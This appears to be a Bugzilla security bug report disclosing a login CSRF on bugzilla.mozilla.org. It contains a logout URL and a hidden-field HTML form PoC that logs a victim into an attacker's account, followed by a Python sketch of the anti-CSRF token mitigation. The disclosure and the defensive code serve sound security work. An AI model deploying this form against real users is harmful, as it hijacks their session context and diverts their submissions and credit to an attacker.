Closed Bug 963687 Opened 10 years ago Closed 10 years ago

Switching a user to another account

Categories

(Bugzilla :: User Accounts, defect)

defect
Not set
normal

Tracking


RESOLVED DUPLICATE of bug 713926

People

(Reporter: dawid, Unassigned)

Details

(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])

User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)

Steps to reproduce:

It is possible to log the user in to another account (CSRF attack). Steps to reproduce: the user logs in to his account and then the following actions are performed:
1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log the user in to another account. POC (for demonstration purposes with a Submit button; normally sent automatically):

<html>
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="E-MAIL_ATTACKER" />
      <input type="hidden" name="Bugzilla&#95;password" value="PASSWORD_ATTACKER" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

It is assumed that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists.

There might be different reasons for the attacker to launch this attack. One example is getting credit or a bounty for a submitted bug (the attacker logs the user into his account; the user thinks that he is using his own account and submits a bug; the action is done from the attacker's account and the credit/bounty goes to the attacker).

Regards,
Dawid Czagan
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]
Group: bugzilla-security
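The standard mitigation for the login CSRF described in this report is an anti-CSRF token that is issued to the anonymous (pre-login) session and required on both the login and the logout form, so a cross-site POST that cannot read the victim's token is refused. The following is an added illustration written for this page, not Bugzilla's own code: the session store, the user table and the handler signatures are constructed stand-ins, and the form field names are the ones used in the PoC above.

```python
import secrets
from hmac import compare_digest

# Constructed in-memory session store: session id -> {"user", "token"}.
_sessions: dict[str, dict] = {}
# Constructed credential table; a real server checks a password hash instead.
_USERS = {"victim@example.invalid": "victim-pw", "attacker@example.invalid": "attacker-pw"}


def start_session() -> str:
    """Issue an anonymous session cookie that already carries an anti-CSRF token.
    Minting the token before login is what protects the login form itself."""
    sid = secrets.token_urlsafe(16)
    _sessions[sid] = {"user": None, "token": secrets.token_urlsafe(16)}
    return sid


def form_token(sid: str) -> str:
    """Value the site's own login/logout forms embed as a hidden field."""
    return _sessions[sid]["token"]


def current_user(sid: str):
    return _sessions[sid]["user"]


def _token_ok(sid: str, form: dict) -> bool:
    sess = _sessions.get(sid)
    submitted = form.get("token", "")
    return bool(sess) and compare_digest(submitted.encode(), sess["token"].encode())


def handle_login(method: str, sid: str, form: dict):
    if method != "POST":
        return 405, "login must be POSTed"
    if not _token_ok(sid, form):
        # The cross-site form in the report has no way to learn the victim's token.
        return 403, "missing or invalid anti-CSRF token"
    email, pw = form.get("Bugzilla_login"), form.get("Bugzilla_password")
    if _USERS.get(email) != pw:
        return 401, "bad credentials"
    _sessions[sid]["user"] = email
    _sessions[sid]["token"] = secrets.token_urlsafe(16)  # rotate after a state change
    return 200, f"logged in as {email}"


def handle_logout(method: str, sid: str, form: dict):
    # Step 1 of the report relies on logout via a plain GET link; require POST + token.
    if method != "POST":
        return 405, "logout must be POSTed"
    if not _token_ok(sid, form):
        return 403, "missing or invalid anti-CSRF token"
    _sessions[sid]["user"] = None
    return 200, "logged out"
```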